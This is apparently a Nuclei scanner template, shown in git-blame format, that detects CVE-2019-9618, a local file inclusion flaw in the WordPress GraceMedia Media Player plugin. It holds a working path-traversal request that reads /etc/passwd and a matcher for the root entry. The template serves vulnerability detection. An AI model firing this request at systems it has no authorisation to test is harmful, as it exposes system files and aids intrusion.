2021-07-15 02:48:59 +00:00
|
|
|
id: CVE-2019-9618
|
|
|
|
|
|
|
|
info:
|
2022-05-09 16:12:52 +00:00
|
|
|
name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion
|
2021-07-15 02:48:59 +00:00
|
|
|
author: daffainfo
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: critical
|
2022-05-09 16:12:52 +00:00
|
|
|
description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-15 02:48:59 +00:00
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
|
|
|
- https://seclists.org/fulldisclosure/2019/Mar/26
|
2021-08-25 12:09:42 +00:00
|
|
|
- https://www.exploit-db.com/exploits/46537
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-9618
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wordpress,wp-plugin,lfi,seclists,edb,cve,cve2019
|
2021-07-15 02:48:59 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-07-15 02:48:59 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-02-02 16:47:13 +00:00
|
|
|
- 500
|
2022-05-09 16:12:52 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/03
|